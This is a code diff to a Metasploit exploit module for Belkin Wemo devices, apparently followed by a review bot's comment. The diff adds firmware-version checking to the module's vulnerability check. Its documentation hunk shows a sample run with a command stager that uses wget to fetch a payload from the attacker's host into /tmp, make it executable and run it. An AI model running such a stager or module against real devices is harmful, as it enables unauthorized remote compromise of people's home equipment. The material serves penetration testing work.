diff --git a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
index ac13bc43ea..5ef1f46359 100644
--- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
+++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
@@ -32,7 +32,9 @@ for Crock-Pot and 49153 for other devices.
 msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
 [*] Started reverse TCP handler on 10.22.22.4:4444
-[+] Wemo-enabled device detected
+[*] Wemo-enabled device detected
+[*] Found firmware version: 2.00.6461
+[*] 10.22.22.1:49152 - The target appears to be vulnerable.
 [*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
 [*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
 [*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
diff --git a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
index 587324c127..71af943c01 100644
--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
 },
 'Author' => [
 'phikshun', # Discovery, UFuzz, and modules
- 'wvu' # Crock-Pot testing and module
+ 'wvu', # Crock-Pot testing and module
+ 'nstarke' # Version-checking research and implementation
 ],
 'References' => [
 ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
@@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Stability' => [CRASH_SAFE],
 'SideEffects' => [ARTIFACTS_ON_DISK],
 'Reliablity' => [REPEATABLE_SESSION],
- 'NOCVE' => 'Patched in 2.00.8643' # TODO: Add firmware check
+ 'NOCVE' => 'Patched in 2.00.8643'
 }
 ))
@@ -76,23 +77,45 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def check
+ checkcode = CheckCode::Unknown
+
 res = send_request_cgi(
 'method' => 'GET',
 'uri' => '/setup.xml'
 )
- if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
- vprint_good('Wemo-enabled device detected')
- return CheckCode::Appears
+ unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
+ vprint_error('Wemo-enabled device not detected')
+ return checkcode
 end
- CheckCode::Safe
+ vprint_status('Wemo-enabled device detected')
+ checkcode = CheckCode::Detected
+
+ version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
+ v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Gem::Version.new($1)
+
+ unless version
+ vprint_error('Could not determine firmware version')
+ return checkcode
+ end
+
+ vprint_status("Found firmware version: #{version}")
+
+ # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
+ if version < Gem::Version.new('2.00.8643')
+ checkcode = CheckCode::Appears
+ else
+ checkcode = CheckCode::Safe
+ end
+
+ checkcode
 end
 def exploit
 checkcode = check
- unless checkcode == CheckCode::Appears || datastore['ForceExploit']
+ unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
 fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
 end
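Review bot: `exploit` now gates on `checkcode == CheckCode::Vulnerable`, but the `check` in this hunk never yields that code — its paths return Unknown, Detected, Safe or, for firmware older than 2.00.8643, Appears — so on a default run the gate only passes if `CheckCode#==` treats Appears as matching Vulnerable, which is not visible here (the sample run in the documentation hunk does proceed past "appears to be vulnerable", so presumably it does). If that equivalence is what the comparison relies on, a comment such as `# CheckCode#== accepts Appears for Vulnerable` would save the next reader the same question; if it is not, the comparison should stay on `CheckCode::Appears`, as the removed line had it. Separately, the `version = (v = …) && v =~ … && $1 && Gem::Version.new($1)` chain reads more plainly without the `$1` global, e.g. `match = res.get_xml_document.at('firmwareVersion')&.text&.match(/WeMo_WW_(\d+(?:\.\d+)+)/)` followed by `version = match && Gem::Version.new(match[1])`. `exploit`'s body continues past the end of the hunk.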